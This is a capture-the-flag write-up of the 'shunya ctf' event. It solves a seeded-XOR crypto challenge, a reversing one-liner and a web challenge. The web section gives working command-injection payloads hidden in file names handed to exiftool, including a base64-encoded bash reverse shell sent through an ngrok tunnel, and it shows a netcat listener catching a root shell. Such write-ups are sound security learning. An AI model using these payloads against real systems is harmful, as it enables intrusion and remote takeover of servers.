shunya ctf
BIBBA 1/Forensics
- description
sanity check
- description
- go to the source code and search for “0CTF”
echoes of encryption/crypto
- description
import random import string def encrypt_string(input_string, seed): random.seed(seed) allowed_chars = string.ascii_letters + string.digits key = ''.join(random.choices(allowed_chars, k=len(input_string))) encrypted_string = '' for i in range(len(input_string)): encrypted_char = chr(ord(input_string[i]) ^ ord(key[i])) encrypted_string += encrypted_char return encrypted_string.encode().hex() seed_value = '311222' input_string = "" encrypted = encrypt_string(input_string, seed_value)
- cipher
import random import string #seed1='CVE-2022-42269' #seed1='202242269' #seed1='CVE-2022-42269' #seed1=7.9 seed1=202242269 random.seed(seed1) allowed_chars = string.ascii_letters + string.digits key = ''.join(random.choices(allowed_chars, k=43)) # print("key si ",key,"len is ",len(key)) c='5e04610a22042638723c571e1a5436142764061f39176b4414204636251072220a35583a60234d2d28082b' #after applying bytes.fromhex() value1=bytes.fromhex(c) #after decodig to asci from bytes value2=value1.decode() # print("value2 is ",value2,"len is ",len(value2))#43 ans='' for i in range(len(value2)): x=chr(ord(value2[i])^ord(key[i])) ans=ans+x # print("ans is ",ans) # print("rev is ",ans[::-1]) print("ans ",ans)
- 0CTF{alw4y5_r3ad_7he_d3scr!pti0n_c4r3fully}
Data’s Data/web
- description
- frontend
- it runs exiftool on the provided file
- so it is could be like
exiftool filename.extension
- so if this is the case we can try to execute commands(cmd injection)
- IFS -internal field seperator
making malicious file names
1:try id
C:\home\radha\Desktop\exiftool> touch '$(id)' C:\home\radha\Desktop\exiftool> ls '$(id)'
- result
2: try to have a blind cmd execution(sleep?)
C:\home\radha\Desktop\exiftool> touch '$(sleep${IFS}10)' C:\home\radha\Desktop\exiftool> ls '$(id)' '$(sleep${IFS}10)'
- here the
is for a space - we do get the response only after 10 secnonds from browser web page
getting reverse shell
bash -i >& /dev/tcp/ 0>&1
- started a ngrok tcp server at port x(say 1234)
ngrok tcp 1234
- started a netcat listner at port x(1234)
nc -lvp 1234
- the
is part of hostname - the 18308 is the corresponding port
C:\home\radha\Desktop\exiftool> ngrok tcp 1234
- the charcters like &> must be encoded
- so i did base64 encoding
- payload of reverse shell
C:\home\radha\Desktop\exiftool> echo 'bash -i >& /dev/tcp/ 0>&1'|base64 YmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5pbi5uZ3Jvay5pby8xNzAxMSAwPiYxCg==
- we need this payload to be base64 decoded on the server and get executed
- so we need to run on server like this
echo THIS_PAYLOAD |base64 -d|bash
- so this must be exeuted on the server side
- just as we executed sleep by $(sleep${IFS}10) we follow a similar approach
$(echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5pbi5uZ3Jvay5pby8xNzAxMSAwPiYxCg'|base64 -d|bash) $(echo${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5pbi5uZ3Jvay5pby8xNzAxMSAwPiYxCg'|base64${IFS}-d|bash)
so this must be the name of file
- creatig file
touch "$(echo${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5pbi5uZ3Jvay5pby8xNzAxMSAwPiYxCg'|base64${IFS}-d|bash)"
- rev shell
C:\home\radha\Desktop\exiftool> nc -nvlp 1234 listening on [any] 1234 ... connect to [] from (UNKNOWN) [] 37650 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@traboda:/# whoami whoami root root@traboda:/# ls ls
- gettgin flag
root@traboda:/# cat Do* cat Do* FROM python:3.11 WORKDIR / RUN apt update RUN apt -y install exiftool COPY requirements.txt requirements.txt RUN pip install -r requirements.txt COPY . . ENV flag="0CTF{Congratulations_for_finding_the_flag}" EXPOSE 80 CMD python3 index.pyroot@traboda:/#
- 0CTF{Congratulations_for_finding_the_flag}
one liner/rev
- description
flag = "ƃŰŶʼnůļźŞŷŭŪƄŰŘŰŧŖŔŦĦŨĬƀźōşŋůIJňijźĖőƃũťũŸŪĞ" flag = [~(c^i)*(-int(1/(5**0.5) * ((1 + 5**0.5)**1 / 2 - (1 - 5**0.5)**1 / 2))) + len(flag) * 6 + 15 for i, c in enumerate([ord(a) for a in flag[::-int(1/(5**0.5) * ((1 + 5**0.5)**1 / 2 - (1 - 5**0.5)**1 / 2))]])] print(tostr(flag)) # 0CTF{___R___E__D___A___C____T_____E____D______}
- trying to see the approch
flag = "ƃŰŶʼnůļźŞŷŭŪƄŰŘŰŧŖŔŦĦŨĬƀźōşŋůIJňijźĖőƃũťũŸŪĞ" ord_values=[] for i in flag: ord_values.append(ord(i)) new_array=[] ans='' for i,x in enumerate(ord_values): value1=x-261 value2=value1*-1 value3=~(value2) value4=value3^i new_array.append(value4) ans=ans+chr(value4) print("ans is ",ans[::-1])
- output
C:\tmp> nano C:\tmp> python ans is 0CTF{@_j0k3_0r_@_cl3v3r_@nd_funny_r3m@rk} C:\tmp>
- 0CTF{@j0k3_0r@cl3v3r@nd_funny_r3m@rk}
score board